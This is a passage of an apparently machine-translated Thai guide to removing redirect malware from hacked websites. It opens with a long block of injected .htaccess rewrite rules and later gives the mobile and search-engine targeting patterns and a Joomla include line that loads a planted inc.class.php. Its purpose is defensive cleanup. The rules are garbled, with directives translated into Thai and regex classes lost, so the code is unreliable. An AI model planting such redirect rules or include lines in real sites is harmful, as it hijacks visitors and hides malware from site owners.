+.*+.*&.*=+.*+.*+.*&.*=+.*+.*+.*$ ?$148$146=$147&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)+%(+)+%([^\d\/]+)+% (+)+%([^\d\/]+)+%(+)+%+%(+)+%+([^\d\/]+)&.*=+&.*=+ $ ?$11$1=$10&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%.*%.*+%+%.*+%.*%.*+%.*+%.*+%. *%.*+%.*+%.*+%+%.*+%.*%.*+%+.*%.*+%.*+-%.*+%+%.*+% .*+%.*+%+%.*+%.*+%.*+%.*%.*+%+%.*+%+.*\/$ ?$2$1=$3&%(QUERY_STRING )[ล]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%.*%.*+%.*%.*+%.*+%.*+%.*%.*+% +.*\/$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)\/.*-.*\/+\/.*$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([ ^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+ )(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+ )+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d \/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+ )+%+%(+)+%+([^\d\/]+)\/.*\/+\/$ ?$36$1=$35&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*+\/$ ?$1$3=$4&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)F%(+)+%+%(+)+%([^\d \/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([ ^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)% (+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/] +)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d \/]+)+%+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+% +%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+ %([^\d\/]+)(+)&.*=-+&.*=-+$ ?$49$38=$50&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/.*-.*-.*-.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/.*+\/$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)F%(+)+%+%(+)+%([^\d \/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([ ^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)% (+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/] +)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d \/]+)++%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+ %(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+% ([^\d\/]+)(+)&.*=-+&.*=-+$ ?$49$38=$50&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/+.*+\/$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)..*$ ?$2$1=$3&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%.*%.*+%+%.*+%.*%.*+%.*+%.*+%. *%.*+%.*+%.*+%+%.*+%.*%.*+%+.*%.*+%.*+-%.*+%+%.*+% .*+%.*+%+%.*+%.*+%.*+%.*%.*+%+%.*+%+.*\/.*\/+\/$ ?$2 $1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)&.*=-+$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)&.*=+$ ?$2$1=$3&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*\/$ ?$1$3=$4&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)(.*)+%+%+.*-S.*..*$ ?$2$1=$3&%(QUERY_STRING)[ แอล]
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)..*$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%([^\d\/]+ )([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+)+ %+([^\d\/]+)\/$ ?$15$1=$14&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([ ^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+ )(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+ )+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d \/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+ )+%+%(+)+%+([^\d\/]+)\/$ ?$36$1=$35&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)\/$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)-+\/$ ?$1$3=$2&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)-.*\/\?.*=+$ ?$1$3=$2&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)-.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]
หากคุณเห็นสิ่งนี้คุณสามารถลบได้อย่างปลอดภัย หากคุณสงสัยว่าจะเหลือบรรทัดใดให้นำไฟล์มาตรฐานของ CMS ของคุณไป - จะไม่มีไวรัสอยู่ที่นั่น!
โดยทั่วไปแล้ว การเปลี่ยนเส้นทางจะกำหนดไว้สำหรับคำขอจากอุปกรณ์มือถือและแท็บเล็ต:
android|plucker|pocket|psp|symbian|treo|vodafone|wapและชื่อมือถือรูปแบบอื่น ๆ
เช่นเดียวกับการเปลี่ยนจากเครื่องมือค้นหา:
yandex|google|mail|rambler|vk.com
หากจุดนี้ไม่ช่วยคุณควรใส่ใจกับโค้ดของเพจ - บางครั้งการเปลี่ยนเส้นทางมักถูกเพิ่มผ่าน Javascript
เพื่อกำจัดโค้ดที่เป็นอันตราย คุณอาจต้องแทนที่ทั้งหมดจำนวนมาก .jsไฟล์.
อย่าลืมตรวจสอบไฟล์ดัชนีและโฟลเดอร์เทมเพลต - นี่คือที่โปรดของแฮกเกอร์สำหรับไวรัส ตรวจดูไฟล์ต่างๆ อย่างระมัดระวังเป็นพิเศษ index.php, footer.php, head.php, header.php- เมื่อเร็ว ๆ นี้ได้กลายเป็นที่นิยมที่จะวางไวรัสที่ไม่ได้อยู่ในตัวพวกเขา แต่อยู่ในรูปแบบของลิงก์ ดังนั้นควรตรวจสอบอย่างรอบคอบว่าไฟล์ใดถูกโหลดโดยใช้คำสั่ง รวมและ จำเป็นต้อง.
การแทรกที่ซับซ้อนที่สุดจะถูกสร้างเป็นโมดูล ปลั๊กอิน และส่วนประกอบที่สามารถโหลดได้ นี่อาจเป็นโมดูลที่ใช้งานแยกกัน (โดยเฉพาะอย่างยิ่งหากแผงผู้ดูแลระบบถูกแฮ็ก) หรือเพียงแค่ใส่โค้ดที่เข้ารหัสลงในไฟล์ของส่วนขยายที่รู้จักและเป็นที่นิยม
ตัวอย่างเช่น เมื่อเร็ว ๆ นี้ฉันเจอไซต์มากกว่าหนึ่งแห่ง จุมลา(โดยเฉพาะบน จูมล่า 2.5) ที่ไหนระหว่างทาง รวมถึง/inc.class.phpมีไวรัสอยู่ และบรรทัดต่อไปนี้ถูกแทรกลงในไฟล์ application.php ในโฟลเดอร์เดียวกัน
need_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");
มักจะคู่ขนานกับสิ่งนี้ ไลบรารี/joomla/แอปพลิเคชันมีไวรัสเปลี่ยนเส้นทางชื่อ joomla-app.php
ไม่ว่าในกรณีใด หากคุณสังเกตเห็นการเปลี่ยนเส้นทางไปยังไซต์บุคคลที่สามบนไซต์ คุณควรใช้มาตรการรักษาความปลอดภัยและตรวจสอบทั้งไซต์อย่างแน่นอน หากคุณไม่สามารถจัดการด้วยตัวเองได้ คุณควรติดต่อผู้เชี่ยวชาญด้านการกำจัดไวรัสและการป้องกันเว็บไซต์อย่างแน่นอน